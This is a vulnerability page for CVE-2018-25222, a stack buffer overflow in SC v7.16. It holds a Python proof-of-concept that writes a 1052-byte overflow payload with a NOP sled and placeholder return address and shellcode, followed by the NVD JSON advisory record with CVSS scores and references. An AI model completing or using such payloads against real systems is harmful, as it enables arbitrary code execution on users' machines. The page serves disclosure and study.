CVE-2018-25222

#!/usr/bin/env python3 # PoC for CVE-2018-25222 Stack Based Buffer Overflow import sys # Buffer overflow offset calculated at 1052 bytes offset = 1052 # Placeholder for return address (EIP overwrite) # Actual address needs to be determined via debugging ret_addr = b"\x41\x41\x41\x41" # NOP sled to increase reliability nop_sled = b"\x90" * 32 # Example Shellcode (exec /bin/sh or calc.exe) # Warning: For educational purposes only shellcode = b"\xCC" * 100 # Construct the payload payload = b"A" * offset + ret_addr + nop_sled + shellcode try: # Write payload to file or send to vulnerable application with open("cve_2018_25222_poc.txt", "wb") as f: f.write(payload) print("[+] Payload generated successfully.") print("[+] Payload length: {} bytes".format(len(payload))) except Exception as e: print("[-] Error generating payload: {}".format(e))

{"cve": {"id": "CVE-2018-25222", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:02.983", "lastModified": "2026-05-01T14:41:28.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 1052 bytes to overwrite the instruction pointer and execute shellcode in the application context."}, {"lang": "es", "value": "SC v7.16 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales ejecutar código arbitrario al proporcionar una entrada sobredimensionada que excede los límites del búfer. Los atacantes pueden crear cadenas de entrada maliciosas que excedan los 1052 bytes para sobrescribir el puntero de instrucción y ejecutar shellcode en el contexto de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44279", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sc-stack-based-buffer-overflow-remote-code-execution", "source": "[email protected]"}]}}